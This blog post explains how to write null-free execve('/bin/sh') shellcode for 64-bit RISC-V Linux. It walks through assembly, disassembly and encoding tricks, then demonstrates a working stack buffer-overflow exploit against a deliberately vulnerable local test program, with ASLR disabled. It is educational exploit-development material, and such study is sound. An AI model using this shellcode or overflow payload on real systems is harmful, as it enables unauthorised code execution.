In this post I’m going to summarise some relevant background about the RISC-V architecture and Linux syscalls, then show how shellcode can be written and assembled using the GNU toolchain. As you will see, the output machine code has some null bytes in it so I’ll point out where they’re coming from and iterate through a couple of versions to remove them. I’m just making this up as I go so look out for better techniques.
Real hardware is still difficult and expensive to obtain so I’ve been using a qemu virtual machine running the unfinished Debian RISC-V port. The setup process is moderately involved but fully documented on the Debian wiki. While RISC-V supports a number of configurations it appears that 64-bit little-endian (RV64) will be the standard one for general purpose computing.
For getting started with shellcoding here is the key background information:
- In the base standard, instructions are always 32 bits and must be 32-bit-aligned in memory.
- Some architectural features are optional extensions. One to be aware of is the Compressed “C” extension, which allows some instructions to shrink to 16 bits, mixed in with 32 bit ones. Instruction alignment is relaxed to 16-bit boundaries.
- qemu’s emulated CPU has the C extension and the assembler will produce a mixture of 16 and 32 bit instructions. I suspect that this support will be common in real CPUs for size and performance reasons.
- There are 32 integer registers, 64 bits in width, named x0 to x31. The program counter pc is separate and cannot be directly referenced. The registers are given alternative names like sp (stack pointer) and so on, to encourage consistent usage. x0 (zero) always contains 0.
- System calls are invoked using the ecall instruction, which has no parameters. The syscall number is taken from register a7 and the arguments from a0 to a5.
- Each individual instruction is stored little-endian in memory. objdump displays them big-endian, which is how they are documented in the ISA manual, so be careful.
- There are no stack-manipulating instructions like x86’s push and pop. Return addresses are stored in a “link register” of your choice. Pushes and pops are just loads and stores relative to sp (or s0, the frame pointer).
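Since the encodings later in the post depend on register numbers rather than names, here is a small lookup sketch in Python. The table follows the standard RISC-V calling convention; the helper name reg_index is made up for illustration.

```python
# ABI names for the integer registers x0..x31 (standard RISC-V calling convention).
ABI_NAMES = (
    ["zero", "ra", "sp", "gp", "tp", "t0", "t1", "t2", "s0", "s1"]  # x0..x9
    + [f"a{i}" for i in range(8)]       # x10..x17: a0..a7
    + [f"s{i}" for i in range(2, 12)]   # x18..x27: s2..s11
    + [f"t{i}" for i in range(3, 7)]    # x28..x31: t3..t6
)


def reg_index(name):
    """Return the x-register number for an ABI name (hypothetical helper)."""
    return ABI_NAMES.index(name)


for name in ("zero", "sp", "s1", "a0", "a3", "a7", "t6"):
    print(f"{name:>4} = x{reg_index(name)}")
```

The registers used in this post are s1 (x9), a0 to a3 (x10 to x13) and a7 (x17).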
If in doubt refer to the User-Level ISA on the RISC-V website. It’s surprisingly readable and explains some of the design motivations too.
It’s relatively easy to install a riscv64 cross-compiler on Debian but it’s more interesting to run the full VM so I can test my code. I was able to install a native toolchain inside the VM with apt so that’s what I’m using. The list of extensions appears in cpuinfo below (“c” for compressed).

    root@riscv64:~# uname -a
    Linux riscv64 4.15.0-00048-gfe92d7905c6e-dirty #1 SMP Wed Aug 22 18:43:55 AEST 2018 riscv64 GNU/Linux
    root@riscv64:~# cat /proc/cpuinfo
    hart : 0
    isa : rv64imafdcsu
    mmu : sv48
    root@riscv64:~# gcc -v
    Using built-in specs.
    COLLECT_GCC=gcc
    COLLECT_LTO_WRAPPER=/usr/lib/gcc/riscv64-linux-gnu/8/lto-wrapper
    Target: riscv64-linux-gnu
    ...
Let’s go ahead and assemble some basic shellcode. It should launch /bin/sh using the execve() syscall. According to /usr/include/asm-generic/unistd.h that’s syscall number 221. I’m going to be sloppy and set both the argv and envp arguments (a1 and a2) to null. I just need a pointer to the path in a0. I create execve.s:

    .global _start
    .text
    _start:
        li s1, 0x68732f2f6e69622f   # Load "/bin//sh" backwards into s1
        sd s1, -16(sp)              # Store dword s1 on the stack
        sd zero, -8(sp)             # Store dword zero after to terminate
        addi a0,sp,-16              # a0 = filename = sp + (-16)
        slt a1,zero,-1              # a1 = argv set to 0
        slt a2,zero,-1              # a2 = envp set to 0
        li a7, 221                  # execve = 221
        ecall                       # Do syscall
I’ve already done a couple of basic things to avoid nulls in the output. slt (set if less than) is a tidy way to load zero into a register: 0 is not less than -1, so the result is 0. I also place my data just below sp instead of just above because small positive offsets tend to have lots of zeroes in them.
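To see where the constant in the li comes from, here is a quick check in Python. It is only a sketch of the arithmetic: the eight bytes of the path are read as one little-endian 64-bit integer, which is why the string looks backwards in the hex literal. The doubled slash pads the path to exactly eight bytes.

```python
path = b"/bin//sh"  # 8 bytes, so it fills one 64-bit register exactly

# Interpret the bytes as a little-endian integer: the first character
# ends up in the least significant byte of the register.
value = int.from_bytes(path, "little")
print(hex(value))

# sd writes the register back to memory least significant byte first,
# so the string reappears on the stack in reading order.
stored = value.to_bytes(8, "little")
print(stored)
```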
Assemble it into an executable:
    $ gcc execve.s -c
    $ ld execve.o -o execve
As hoped, this runs:

    tk@riscv64:~$ ./execve
    $

    $ strace ./execve
    execve("./execve", ["./execve"], 0x3ffffff6d0 /* 16 vars */) = 0
    execve("/bin//sh", NULL, NULL) = 0
    ...
Now let’s have a look at how this is actually assembled.
    $ objdump -d execve
    ...
    0000000000010078 <_start>:
       10078: 0343a4b7    lui s1,0x343a
       1007c: 9794849b    addiw s1,s1,-1671
       10080: 00c49493    slli s1,s1,0xc
       10084: 7b748493    addi s1,s1,1975
       10088: 00c49493    slli s1,s1,0xc
       1008c: 34b48493    addi s1,s1,843
       10090: 00d49493    slli s1,s1,0xd
       10094: 22f48493    addi s1,s1,559
       10098: fe913823    sd s1,-16(sp)
       1009c: fe013c23    sd zero,-8(sp)
       100a0: ff010513    addi a0,sp,-16
       100a4: fff02593    slti a1,zero,-1
       100a8: fff02613    slti a2,zero,-1
       100ac: 0dd00893    li a7,221
       100b0: 00000073    ecall
That’s way more instructions than we ever typed. The reason is that li is one of several pseudo-instructions. Since it’s impossible to load an immediate 64-bit value with a 32-bit instruction, the assembler automatically splits it into a series of lui, addi/addiw and slli (shift logical left) instructions.
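To convince myself that the expanded sequence really rebuilds the constant, the eight instructions can be replayed in Python. This is a rough model of the instruction semantics (64-bit wraparound, 32-bit sign extension for lui and addiw), not an emulator, and the function names simply mirror the mnemonics.

```python
MASK64 = (1 << 64) - 1


def sext32(x):
    """Sign-extend the low 32 bits of x to a Python int."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x


def lui(imm20):
    # Load the 20-bit immediate into bits 31:12, sign-extended to 64 bits.
    return sext32(imm20 << 12) & MASK64


def addiw(reg, imm):
    # 32-bit add, result sign-extended to 64 bits.
    return sext32(reg + imm) & MASK64


def addi(reg, imm):
    return (reg + imm) & MASK64


def slli(reg, shamt):
    return (reg << shamt) & MASK64


s1 = lui(0x343A)
s1 = addiw(s1, -1671)
s1 = slli(s1, 12)
s1 = addi(s1, 1975)
s1 = slli(s1, 12)
s1 = addi(s1, 843)
s1 = slli(s1, 13)
s1 = addi(s1, 559)
print(hex(s1))
```

The final value is the same 0x68732f2f6e69622f that was passed to li.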
We have quite a few null bytes in that auto-generated instruction sequence. In fact, on RV64 a 32-bit slli by definition starts with six 0 bits followed by a 6-bit shift amount (seven 0 bits and 5 bits on RV32), so any shift of less than 16 leaves the top byte null. How annoying. There is a way out though: remember the compressed instructions? There is a compressed version (C.SLLI in the ISA manual) which isn’t full of zeroes.
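The two encodings can be compared directly. The sketch below packs slli s1,s1,N both ways using the field layouts from the ISA manual as I understand them; the encoder function names are my own.

```python
import struct

S1 = 9  # s1 is register x9


def encode_slli(rd, rs1, shamt):
    """32-bit SLLI on RV64: funct6=0 | shamt[5:0] | rs1 | funct3=001 | rd | 0x13."""
    return (shamt << 20) | (rs1 << 15) | (0b001 << 12) | (rd << 7) | 0x13


def encode_c_slli(rd, shamt):
    """16-bit C.SLLI: funct3=000 | shamt[5] | rd | shamt[4:0] | op=10."""
    return ((shamt >> 5) << 12) | (rd << 7) | ((shamt & 0x1F) << 2) | 0b10


for shamt in (12, 13):
    wide = struct.pack("<I", encode_slli(S1, S1, shamt))    # bytes as stored in memory
    narrow = struct.pack("<H", encode_c_slli(S1, shamt))
    wide_null = b"\x00" in wide
    narrow_null = b"\x00" in narrow
    print(shamt, wide.hex(), wide_null, narrow.hex(), narrow_null)
```

For the shift amounts used here the 32-bit form always ends in a 0x00 byte, while the 16-bit form does not contain one.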
Let’s replace the li s1, 0x68732f2f6e69622f in our source code with the auto-generated instructions from the disassembly:

    .global _start
    .text
    _start:
        lui s1,0x343a
        addiw s1,s1,-1671
        slli s1,s1,0xc
        addi s1,s1,1975
        slli s1,s1,0xc
        addi s1,s1,843
        slli s1,s1,0xd
        addi s1,s1,559
        sd s1, -16(sp)      # Store it on the stack
        sd zero, -8(sp)     # Store a zero after to terminate
        addi a0,sp,-16      # a0 = sp + (-16)
        slt a1,zero,-1      # a1 set to 0 because 0 > -1
        slt a2,zero,-1      # Ditto for a2
        li a7, 221          # execve = 221
        ecall               # Do syscall
This is the disassembly after reassembling:
    $ gcc execve.s -c; ld execve.o -o execve
    $ objdump -d execve
    ...
    0000000000010078 <_start>:
       10078: 0343a4b7    lui s1,0x343a
       1007c: 9794849b    addiw s1,s1,-1671
       10080: 04b2        slli s1,s1,0xc
       10082: 7b748493    addi s1,s1,1975
       10086: 04b2        slli s1,s1,0xc
       10088: 34b48493    addi s1,s1,843
       1008c: 04b6        slli s1,s1,0xd
       1008e: 22f48493    addi s1,s1,559
       10092: fe913823    sd s1,-16(sp)
       10096: fe013c23    sd zero,-8(sp)
       1009a: ff010513    addi a0,sp,-16
       1009e: fff02593    slti a1,zero,-1
       100a2: fff02613    slti a2,zero,-1
       100a6: 0dd00893    li a7,221
       100aa: 00000073    ecall
Now those nulls are gone. What happened? It seems that the li pseudo-instruction will produce 32-bit slli instructions even if the C extension is available. I guess this is a missing optimisation. If we include the slli instructions directly in the source then the assembler correctly optimises them down to the 16-bit format, which is both smaller and has no nulls.
I want to point out the second-last instruction, li a7,221. It’s interesting that objdump has displayed this as the pseudo-instruction. In reality this is addi a7,zero,221. Adding a value to the zero register is merely a convenient way to load a small immediate value into a register. For certain immediate values this will create a null byte in the shellcode (it’s okay here with 221 = 0x0dd). One possible solution is to null out a higher register like x31 (whose index is all 1s) and then do the addi against that register instead of zero.
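Here is a sketch of which addi immediates cause trouble, again in Python with an encoder of my own. The immediate 0x40 is just an illustrative value, and the x31 variant assumes x31 has already been set to 0 by an earlier null-free instruction.

```python
import struct

ZERO, A7, X31 = 0, 17, 31  # register numbers: zero = x0, a7 = x17


def encode_addi(rd, rs1, imm):
    """ADDI: imm[11:0] | rs1 | funct3=000 | rd | opcode=0x13."""
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (rd << 7) | 0x13


def has_null(word):
    """True if the instruction contains a 0x00 byte as stored in memory."""
    return b"\x00" in struct.pack("<I", word)


cases = [
    ("addi a7,zero,221", encode_addi(A7, ZERO, 221)),
    ("addi a7,zero,0x40", encode_addi(A7, ZERO, 0x40)),  # low nibble of imm is 0
    ("addi a7,x31,0x40", encode_addi(A7, X31, 0x40)),    # assumes x31 == 0
]
for text, word in cases:
    print(f"{text:<18} {word:08x} null={has_null(word)}")
```

With zero as the source register, the third byte holds only the low four bits of the immediate, so any immediate that is a multiple of 16 produces a null there; using x31 fills that byte with 1 bits. This does not help with immediates below 16, where the top byte is still zero.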
Finally we come to ecall. This mnemonic only exists as a 32-bit instruction and must appear exactly as 0x00000073. This was easier to deal with in MIPS, where the syscall opcode has a numeric parameter, so it’s common to see shellcode that fills it with a dummy value like 0x40404. In RISC-V we have no such luck. We have the usual sorts of workarounds: find a vulnerability where nulls are not a badchar, jump to an ecall at a known address, encode the shellcode, or take advantage of the little-endian ordering and try to finish our buffer with 0x73, knowing that there will be three 0x00 chars after it.
For this example let’s assume we have an executable stack. We can generate an ecall instruction at -4(sp) and jump to it. Replace the ecall with the following:

        # the 8 bytes below sp are already 0
        addi a3,zero,0x73   # Assign 0x73 to a3
        sb a3, -4(sp)       # Store single byte at sp-4
        addi a3,sp,-2       # a3 = sp - 2
        jr -2(a3)           # jump to a3 - 2
To avoid nulls, the jr needs to have a small negative offset and I also need to use a higher register than sp. With no link register, the second byte of the jr encoding is zero unless the base register has an odd index, and sp is x2. Here I’ve chosen to use a3 (x13). I need to get the stack pointer value into a3, but again I need to use a small negative offset in the addi to avoid nulls. I “share” the required offset of -4 across the two instructions so they both get a small negative.
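The choices above can be checked by encoding the alternatives. This is a sketch using a generic I-type encoder of my own (jr is jalr with rd = zero); it compares the obvious forms against the pair I ended up with.

```python
import struct

ZERO, SP, A3 = 0, 2, 13      # register numbers
OP_IMM, OP_JALR = 0x13, 0x67  # major opcodes for addi and jalr


def encode_i(opcode, rd, rs1, imm, funct3=0):
    """Generic I-type: imm[11:0] | rs1 | funct3 | rd | opcode."""
    return ((imm & 0xFFF) << 20) | (rs1 << 15) | (funct3 << 12) | (rd << 7) | opcode


def has_null(word):
    return b"\x00" in struct.pack("<I", word)


candidates = [
    ("jr -4(sp)", encode_i(OP_JALR, ZERO, SP, -4)),      # direct jump: even base register
    ("addi a3,sp,0", encode_i(OP_IMM, A3, SP, 0)),       # plain copy: zero immediate
    ("addi a3,sp,-2", encode_i(OP_IMM, A3, SP, -2)),     # used in the shellcode
    ("jr -2(a3)", encode_i(OP_JALR, ZERO, A3, -2)),      # used in the shellcode
]
for text, word in candidates:
    raw = struct.pack("<I", word)
    print(f"{text:<14} {raw.hex()} null={has_null(word)}")
```

The first two candidates each contain a null byte, while the pair that splits the offset as -2 and -2 does not, and still lands on sp - 4.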
This time it must be compiled with an executable stack. Otherwise the program will segfault on the jump.
$ gcc execve.s -c; ld execve.o -o execve -z execstack
The final disassembly with no nulls:
    00000000000100b0 <_start>:
       100b0: 0343a4b7    lui s1,0x343a
       100b4: 9794849b    addiw s1,s1,-1671
       100b8: 04b2        slli s1,s1,0xc
       100ba: 7b748493    addi s1,s1,1975
       100be: 04b2        slli s1,s1,0xc
       100c0: 34b48493    addi s1,s1,843
       100c4: 04b6        slli s1,s1,0xd
       100c6: 22f48493    addi s1,s1,559
       100ca: fe913823    sd s1,-16(sp)
       100ce: fe013c23    sd zero,-8(sp)
       100d2: ff010513    addi a0,sp,-16
       100d6: fff02593    slti a1,zero,-1
       100da: fff02613    slti a2,zero,-1
       100de: 0dd00893    li a7,221
       100e2: 07300693    li a3,115
       100e6: fed10e23    sb a3,-4(sp)
       100ea: ffe10693    addi a3,sp,-2
       100ee: ffe68067    jr -2(a3)
Let’s see the bytes in the order we actually need to provide them in our buffer.
    $ objcopy -O binary --only-section=.text execve execve.text
    $ od -t x1 execve.text
    0000000 b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
    0000020 93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
    0000040 01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
    0000060 d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
    0000100 e6 ff
    0000102
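As a sanity check, the od dump can be rebuilt from the objdump listing by writing each instruction word out little-endian. The Python sketch below does that with the values copied from the two listings above, and also confirms the length and the absence of null bytes.

```python
# Instruction words exactly as objdump printed them in the final disassembly.
WORDS = """
0343a4b7 9794849b 04b2 7b748493 04b2 34b48493 04b6 22f48493
fe913823 fe013c23 ff010513 fff02593 fff02613 0dd00893
07300693 fed10e23 ffe10693 ffe68067
""".split()

# Bytes exactly as od printed them.
OD_TEXT = """
b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
e6 ff
"""
od_dump = bytes.fromhex("".join(OD_TEXT.split()))

# Each word is 2 or 4 bytes long and is stored least significant byte first.
shellcode = b"".join(
    int(word, 16).to_bytes(len(word) // 2, "little") for word in WORDS
)

print(len(shellcode))           # total size in bytes
print(shellcode == od_dump)     # does it match what od showed?
print(b"\x00" in shellcode)     # any null bytes left?
```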
Notice that the bytes of each instruction appear in reverse order compared with the objdump listing, because each instruction is stored little-endian. To try it out, let’s set up an embarrassingly vulnerable test environment with a buffer overflow. First disable ASLR so our stack is predictable:
# echo 0 > /proc/sys/kernel/randomize_va_space
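Now create a program, vuln.c, whose do_vuln() function copies its command-line argument into a stack buffer without checking the length, and which prints the location of the buffer, the location of main and the input length.
We will need to compile this with an executable stack also.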
    $ gcc vuln.c -z execstack -o vuln
    $ ./vuln hello
    Location of buffer: 0x3ffffff4c0
    Location of main: 0x2aaaaaa76a
    Input len: 5
I won’t go into detail here but if you look at objdump -d vuln you can work out that inside do_vuln() the return address is stored at 152(sp) and the buffer is at 16(sp), 136 bytes below it. The exploit buffer therefore looks like this:

    [shellcode][AAAAA...padding to total len 136 bytes][ret address overwrite]
    ^ buffer
In practice the location of buffer depends on the size of the arguments on the stack so it takes a bit of trial and error but it does work:
    tk@riscv64:~$ ./vuln `python -c 'b = "\xb7\xa4\x43\x03\x9b\x84\x94\x97\xb2\x04\x93\x84\x74\x7b\xb2\x04\x93\x84\xb4\x34\xb6\x04\x93\x84\xf4\x22\x23\x38\x91\xfe\x23\x3c\x01\xfe\x13\x05\x01\xff\x93\x25\xf0\xff\x13\x26\xf0\xff\x93\x08\xd0\x0d\x93\x06\x30\x07\x23\x0e\xd1\xfe\x93\x06\xe1\xff\x67\x80\xe6\xff"; b += "A"*(136-len(b)); b += "\x40\xf4\xff\xff\x3f"; print b'`
    Location of buffer: 0x3ffffff440
    Location of main: 0x2aaaaaa76a
    Input len: 141
    $
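The one-liner above is hard to read, so here is the same payload built step by step as a Python 3 sketch. The constant names are mine; the offset of 136 and the buffer address are the ones from this particular run and would need adjusting elsewhere. Only the low five bytes of the address are written, which assumes the upper three bytes of the saved return address are already zero.

```python
import struct

SHELLCODE_HEX = """
b7 a4 43 03 9b 84 94 97 b2 04 93 84 74 7b b2 04
93 84 b4 34 b6 04 93 84 f4 22 23 38 91 fe 23 3c
01 fe 13 05 01 ff 93 25 f0 ff 13 26 f0 ff 93 08
d0 0d 93 06 30 07 23 0e d1 fe 93 06 e1 ff 67 80
e6 ff
"""
SHELLCODE = bytes.fromhex("".join(SHELLCODE_HEX.split()))

RET_OFFSET = 136            # distance from the buffer to the saved return address
BUFFER_ADDR = 0x3FFFFFF440  # "Location of buffer" printed by this run of vuln

# Pad with filler up to the return address slot.
padding = b"A" * (RET_OFFSET - len(SHELLCODE))

# Little-endian address with the zero high bytes dropped, since an
# argv string cannot contain nulls.
ret = struct.pack("<Q", BUFFER_ADDR).rstrip(b"\x00")

payload = SHELLCODE + padding + ret
print(len(payload))
print(ret.hex())
```

The total length comes out at 141 bytes, which matches the "Input len" reported by the vulnerable program.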
The complete source, for reference:

    .global _start
    .text
    _start:
        lui s1,0x343a       # Load "/bin//sh" into s1
        addiw s1,s1,-1671
        slli s1,s1,0xc
        addi s1,s1,1975
        slli s1,s1,0xc
        addi s1,s1,843
        slli s1,s1,0xd
        addi s1,s1,559
        sd s1, -16(sp)      # Store it on the stack
        sd zero, -8(sp)     # Store a zero after to terminate
        addi a0,sp,-16      # a0 = sp + (-16)
        slt a1,zero,-1      # a1 set to 0 because 0 > -1
        slt a2,zero,-1      # Ditto for a2
        li a7, 221          # execve = 221
        addi a3,zero,0x73   # Create ecall instruction at -4(sp)
        sb a3, -4(sp)
        addi a3,sp,-2       # Dodge nulls in instructions
        jr -2(a3)           # Jump to -4(sp)